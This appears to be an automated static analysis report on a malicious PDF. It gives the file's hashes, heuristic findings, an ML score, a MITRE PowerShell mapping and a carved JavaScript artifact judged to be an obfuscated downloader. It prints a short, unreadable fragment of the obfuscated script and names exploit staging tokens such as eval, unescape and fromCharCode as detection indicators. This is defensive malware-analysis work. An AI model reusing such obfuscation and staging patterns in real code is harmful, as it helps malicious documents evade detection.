Malicious PDF / .PHZ — malware analysis report

Static analysis result for SHA-256 8bc8fe3434b0b1c3…

Verdict: MALICIOUS

File type: PDF / .PHZ

Size: 9.4 KB
Created: 2010-05-26 09:52:27
Authoring application: kSwltWptp (via i3oomXB1)
First seen: 2026-05-09
MD5: 011d205bff42e0989e07f8906eee48fd
SHA-1: 9a84fc8061be3afdd39b13fdcef6e9b6f5c37af9
SHA-256: 8bc8fe3434b0b1c3fc91b33370a72fbd60f082e28e113abf7dcd67b0b73bace6
Risk score: 166

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL. The PDF_EVAL heuristic specifically points to an eval() call within the decoded JavaScript stream, suggesting code execution. The presence of obfuscation indicators in the extracted artifact further supports this. While the exact payload is not discernible due to obfuscation, the pattern strongly suggests a downloader attempting to execute a malicious script.

Machine Learning

  • Nyx PDF Classifier: malicious score 1.0000

Heuristics (4)

  • PDF_JAVASCRIPT: JavaScript action (severity low; 2 related findings)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF_JS_EXPLOIT_CLUSTER: PDF JavaScript exploit cluster (severity critical)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    ABp*pq;\nppLxipaXt)Q >m0{(FDUuSp=pyFKP0g.oVHumnvTUp-p2Y5dHwo,5D5o4Kxw)p+p)E69M;\nppLxip}sgtR5.oh<B6QTwdp=p<RbdFxZb2\"%<o)o)%<o)o)\"M;\npp}sgtR5.oh<B6QTwdp=pE7.x(Ah3mIAu(HP42}sgtR5.oh<B6QTwd1paXt)Q >m0{(FDUuSM;\nppLxip.SB)XhmT>yW4Z(qJp=p2lZv3wYJ6ISF7Ic <p-p)Ec)))))Mp/pyFKP0g.oVHumnvTU;\nppyNip2LxipxAbqqKdb<qJs.L)Np=p);pxAbqqKdb<qJs.L)NpCp.SB)XhmT>yW4Z(qJ;pxAbqqKdb<qJs.L)Np++pMe\npppp7 G)8Jm8ykd}9wO)[xAbqqKdb<qJs.L)N]p=p}sgtR5.oh<B6QTwdp+pHJDDFb7T3w,moUJ8;\nppj\nj\ny<RFA8NRpt5EF)7NbLhJ ltTw2Me\npp …
  • PDF_JS: Embedded JS stream (severity low)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • EXTRACTED_FILE_STATIC_TRIAGE: Suspicious extracted artifact (severity medium)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0007_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 7 at offset 0x242
Size: 7993 bytes
SHA-256: 227b06bb437b8d416e2f038dc33c71cd988f34e777bc1717a40caa874bcbcdbb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 110 of 162 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script